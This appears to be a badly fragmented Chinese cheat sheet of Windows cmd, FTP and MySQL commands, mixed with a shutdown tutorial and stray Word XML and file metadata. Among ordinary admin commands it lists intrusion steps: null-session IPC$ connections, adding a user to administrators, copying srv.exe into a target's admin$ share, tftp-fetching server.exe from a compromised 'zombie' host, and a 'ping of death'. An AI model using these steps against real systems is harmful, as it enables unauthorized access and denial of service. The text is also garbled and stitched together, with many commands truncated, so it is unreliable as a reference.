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use \\ip\ipc$ " " /user:" "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空链接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use \\ip\ipc$ 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密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 /user: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户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非空链接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use h: \\ip\c$ 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密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 /user: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户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直接登陆后映射对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到本地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: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use h: \\ip\c$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登陆后映射对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到本地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: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use \\ip\ipc$ /del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删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链接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use h: /del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删除映射对方到本地的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映射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net user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用户名 密码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add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立用户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user guest /active:yes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激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ues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户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user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查看有哪些用户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net user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帐户名  查看帐户的属性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net localgroup administrator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用户名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add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把“用户”添加到管理员中使其具有管理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员权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意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dministrato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后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复数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start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查看开启了哪些服务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net star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名   开启服务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net start tel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，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start schedule)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net stop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名  停止某服务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time \\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查看对方时间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time \\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 /set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置本地计算机时间与“目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机的时间同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上参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ye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取消确认信息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view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查看本地局域网内开启了哪些共享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view \\ip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查看对方局域网内开启了哪些共享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config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显示系统网络设置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logoff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断开连接的共享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net paus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名  暂停某服务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send ip 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本信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向对方发信息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ver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局域网内正在使用的网络连接类型和信息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share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查看本地开启的共享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share ipc$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开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c$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共享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share ipc$ /del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删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c$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共享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share c$ /del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删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共享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 user guest 12345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ues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户登陆后用将密码改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345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net password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密码  更改系统登陆密码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stat -a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查看开启了哪些端口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常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stat -an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stat -n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查看端口的网络连接情况，常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stat -an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stat -v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查看正在进行的工作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netstat -p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协议名 例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stat -p tcq/ip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查看某协议使用情况（查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cp/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协议使用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情况）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stat -s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查看正在使用的所有协议使用情况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btstat -A ip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中一个端口开了的话，就可查看对方最近登陆的用户名（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前的为用户名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意：参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大写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racert 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参数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计算机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跟踪路由（数据包），参数：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w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数字”用于设置超时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间隔。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ing ip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域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向对方主机发送默认大小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字节的数据，参数：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l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空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数据包大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”；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送数据次数”；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t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指一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in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ing -t -l 65550 ip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死亡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ing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送大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4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文件并一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in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就成了死亡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ing)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config (winipcfg)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indows N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P(windows 95 98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查看本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址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config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用参数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all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显示全部配置信息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list -t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树行列表显示进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系统的附加工具，默认是没有安装的，在安装目录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upport/tool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夹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kill -F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程名  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F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数后强制结束某进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系统的附加工具，默认是没有安装的，在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安装目录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upport/tool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夹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del -F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名  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F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数后就可删除只读文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/A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A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A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A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别表示删除只读、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隐藏、系统、存档文件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A-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A-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A-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A-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示删除除只读、隐藏、系统、存档以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外的文件。例如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EL/AR *.*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示删除当前目录下所有只读文件，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EL/A-S *.*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表示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删除当前目录下除系统文件以外的所有文件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del /S /Q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录 或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rmdir /s /Q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录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删除目录及目录下的所有子目录和文件。同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使用参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/Q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取消删除操作时的系统确认就直接删除。（二个命令作用相同）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mov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盘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\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路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\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移动的文件名 存放移动文件的路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\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移动后文件名  移动文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参数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取消确认移动目录存在相同文件的提示就直接覆盖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c one.txt two.txt &gt; 3st.txt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比二个文件并把不同之处输出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st.tx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中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&gt;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"&gt; &gt;"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重定向命令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t i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  开启已注册的某个计划任务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t /delete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停止所有计划任务，用参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ye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则不需要确认就直接停止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t i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号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delete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停止某个已注册的计划任务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t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查看所有的计划任务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at \\ip tim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程序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一个命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/r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某时间运行对方某程序并重新启动计算机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nger username @host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查看最近有哪些用户登陆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telnet ip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端口  远和登陆服务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默认端口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pen ip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连接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el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登陆后的命令）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elnet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本机上直接键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telne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进入本机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elnet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opy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路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\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路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\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 /y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复制文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到指定的目录为文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用参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就同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取消确认你要改写一份现存目录文件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opy c:\srv.exe \\ip\admin$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复制本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:\srv.ex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到对方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dmi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ppy 1st.jpg/b+2st.txt/a 3st.jpg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st.tx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内容藏身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st.jp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生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st.jp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新的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，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st.tx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头要空三排，参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指二进制文件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SCL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格式文件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opy \\ip\admin$\svv.exe c:\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copy\\ip\admin$\*.*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复制对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dmini$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共享下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r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.ex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（所有文件）至本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xcopy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复制的文件或目录树 目标地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\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录名  复制文件和目录树，用参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Y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不提示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覆盖相同文件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tftp -i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肉机作跳板时这用肉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IP) get server.exe c:\server.ex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登陆后，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erver.ex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载到目标主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:\server.ex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指以二进制模式传送，如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传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x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时用，如不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-i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则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SCI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模式（传送文本文件模式）进行传送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tftp -i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 put c:\server.exe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登陆后，上传本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:\server.ex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至主机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ftp ip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端口  用于上传文件至服务器或进行文件操作，默认端口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i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指用二进制方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式传送（可执行文件进）；默认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SCI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格式传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本文件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oute print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显示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路由，将主要显示网络地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work addre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子网掩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mas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网关地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ateway addre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接口地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nterface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rp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查看和处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R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缓存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R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名字解析的意思，负责把一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解析成一个物理性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AC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地址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rp -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显示出全部信息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star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程序名或命令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/max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min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新开一个新窗口并最大化（最小化）运行某程序或命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令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em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查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p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使用情况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attrib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录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查看某文件（目录）的属性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attrib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文件名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-A -R -S -H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或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+A +R +S +H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去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添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某文件的 存档，只读，系统，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隐藏 属性；用＋则是添加为某属性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ir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查看文件，参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Q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显示文件及目录属系统哪个用户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T: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显示文件创建时间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T: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显示文件上次被访问时间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T:W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次被修改时间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date /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、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time /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使用此参数即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ATE/T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IME/T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只显示当前日期和时间，而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必输入新日期和时间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se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指定环境变量名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=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指派给变量的字符  设置环境变量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et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显示当前所有的环境变量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et p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其它字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显示出当前以字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其它字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开头的所有环境变量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ause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暂停批处理程序，并显示出：请按任意键继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...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f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批处理程序中执行条件处理（更多说明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f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命令及变量）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goto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标签  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md.ex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导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打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头，例如：“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tart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标签）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all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路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\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批处理文件名  从批处理程序中调用另一个批处理程序 （更多说明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all /?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or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一组文件中的每一个文件执行某个特定命令（更多说明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o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命令及变量）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cho o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ff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打开或关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ch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仅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ch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加参数则显示当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ch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置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echo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信息  在屏幕上显示出信息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echo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信息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&gt;&gt; pass.txt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信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存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ass.tx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中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ndstr "Hello" aa.txt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a.tx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中寻找字符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ello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find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名  查找某文件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titl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标题名字  更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M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窗口标题名字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olor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颜色值  设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m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控制台前景和背景颜色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黑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蓝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绿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浅绿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红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紫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黄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=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白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=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灰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=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淡蓝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＝淡绿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=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淡浅绿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=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淡红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=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淡紫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=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淡黄、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=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亮白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promp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称  更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md.ex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显示的命令提示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:\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:\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统一改为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ntSky\ )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prin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名  打印文本文件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er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O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窗口下显示版本信息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inver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弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）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forma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盘符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FS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类型  格式化磁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类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FA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AT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TFS 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例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ormat D: /FS:NTFS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md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录名  创建目录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replac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源文件 要替换文件的目录  替换文件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re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原文件名 新文件名  重命名文件名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ree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树形结构显示出目录，用参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-f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列出第个文件夹中文件名称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typ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名  显示文本文件的内容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mor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名 逐屏显示输出文件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doskey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锁定的命令＝字符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doskey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解锁命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=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O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提供的锁定命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编辑命令行，重新调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in2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命令，并创建宏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如：锁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i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命令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oskey dir=entsky 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能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oskey dir=dir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解锁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oskey dir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=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taskmgr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调出任务管理器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hkdsk /F D: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检查磁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并显示状态报告；加参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f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并修复磁盘上的错误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lntadmn teln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dmn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键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lntadm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选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再选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就可以更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el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默认端口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其它任何端口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xit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退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md.ex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程序或目前，用参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则是退出当前批处理脚本而不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md.exe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path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路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\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执行文件的文件名 为可执行文件设置一个路径。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md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启动一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in2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命令解释窗口。参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eff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/e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关闭、开启命令扩展；更我详细说明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md /?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regedit /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册表文件名  导入注册表；参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指安静模式导入，无任何提示；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regedit /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册表文件名 导出注册表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acl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名 参数 显示或修改文件访问控制列表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C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——针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TF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格式时。参数：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/D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户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定拒绝某用户访问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/P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户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:perm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替换指定用户的访问权限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/G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户名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:perm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赋予指定用户访问权限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Perm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以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: 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无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R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读取，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W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写入，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更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写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F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完全控制；例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acls D:\test.txt /D pub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:\test.tx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拒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u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户访问。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acl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名  查看文件的访问用户权限列表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REM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本内容  在批处理文件中添加注解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tsh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查看或更改本地网络配置情况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I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命令：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isreset /reboot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重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in2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计算机（但有提示系统将重启信息出现）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isreset /star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top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启动（停止）所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nter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isreset /restart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停止然后重新启动所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nter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isreset /status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显示所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nter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状态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isreset /enabl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isable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本地系统上启用（禁用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nter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的重新启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isreset /rebootonerror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当启动、停止或重新启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nter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时，若发生错误将重新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开机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isreset /noforce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若无法停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nter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，将不会强制终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nter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isreset /timeout  Va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到达逾时间（秒）时，仍未停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ntern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，若指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reboo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onerro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数，则电脑将会重新开机。预设值为重新启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秒，停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秒，重新开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秒。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FTP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命令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后面有详细说明内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t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命令行格式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ftp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v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d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i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主机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]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v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显示远程服务器的所有响应信息。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d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使用调试方式。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限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t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自动登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即不使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netr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。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g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取消全局文件名。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elp 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命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]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 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命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]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查看命令说明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by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或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qui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终止主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T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并退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T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管理方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pwd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列出当前远端主机目录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pu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或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send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本地文件名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传到主机上的文件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]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本地一个文件传送至远端主机中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ge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或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ecv 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远程主机文件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] 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载到本地后的文件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]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从远端主机中传送至本地主机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get [remote-files]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从远端主机接收一批文件至本地主机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mput local-file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本地主机中一批文件传送至远端主机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dir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或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s [remote-directory] [local-file]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列出当前远端主机目录中的文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果有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地文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就将结果写至本地文件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ascii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定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SCII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方式传送文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缺省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bi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或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imag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定以二进制方式传送文件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bell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每完成一次文件传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警提示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dup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返回上一级目录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los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中断与远程服务器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t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会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pe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open host[port]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建立指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t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服务器连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指定连接端口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delet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删除远端主机中的文件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mdelete [remote-files]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删除一批文件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mkdir directory-nam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远端主机中建立目录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rename [from] [to]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变远端主机中的文件名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rmdir directory-nam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删除远端主机中的目录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status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显示当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T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状态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system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显示远端主机系统类型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user user-name [password] [account]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重新以别的用户名登录远端主机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open host [port]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重新建立一个新的连接 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promp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交互提示模式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macdef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定义宏命令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lcd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变当前本地主机的工作目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果缺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就转到当前用户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O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录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hmod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改变远端主机的文件权限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ase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当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O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G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命令拷贝的文件名到本地机器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全部转换为小写字母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d remot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dir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入远程主机目录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cdup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入远程主机目录的父目录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!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本地机中执行交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hel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xi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回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t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环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!l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zip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MYSQL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命令：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ysql -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主机地址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户名 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密码 连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YSQL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果刚安装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YSQ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超级用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oo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没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密码的。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例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ysql -h110.110.110.110 -Uroot -P123456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roo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以不用加空格，其它也一样）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exit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退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YSQL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ysqladmin -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用户名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旧密码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password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新密码 修改密码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grant select on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数据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.* to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用户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@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登录主机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dentified by \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密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\";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增加新用户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（注意：和上面不同，下面的因为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YSQ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环境中的命令，所以后面都带一个分号作为命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令结束符） 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how databases;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显示数据库列表。刚开始时才两个数据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ysq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es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ysq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库很重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它里面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MYSQ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系统信息，我们改密码和新增用户，实际上就是用这个库进行操作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D64B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362450" cy="22860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>
          <w:left w:val="dotted" w:sz="12" w:space="26" w:color="E4E4E4"/>
        </w:pBdr>
        <w:shd w:fill="FFFFFF" w:val="clear"/>
        <w:spacing w:lineRule="atLeast" w:line="480" w:before="15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EEFFE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EEFFEE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EEFFE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EEFFE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们可以拿个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m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指令关机来做个示范吧。打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m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输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hutdow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果您要关机输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hutdown -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重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hutdown -r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定时关机，可以输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hutdown -s -t X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代表多少秒后关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秒，就可以输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hutdown -s -t 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体看情况。如果懒得打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m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输入指令的可以制作一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xx.ba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。方法：打开记事本输入关机或者重启定时关机（看用户情况）的代码，保存，文件名可以自行编辑但是，后缀名必须改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a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文件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D64B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762500" cy="25146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256" w:right="0" w:hanging="3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关机指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hutdown -s -t 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指要执行的时间，可以任意更改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关机重启指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hutdown -r -t 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指要执行的时间，可以任意更改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取消关机指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shutdown -a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执行后会出现关机提醒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当然，你也可以写出自己的提醒的消息在后面加几个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shutdown -r -t 10 -c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未知错误，正在重启系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..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ngyan.baidu.com/album/6766299796ce9354d41b8443.html?picindex=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jingyan.baidu.com/album/6766299796ce9354d41b8443.html?picindex=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9:37Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>万象云端 陆荣进</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-10-01T01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1FB5FDC764D8896D8A2970BDD1A71</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-11.1.0.10700</vt:lpwstr>
  </property>
</Properties>
</file>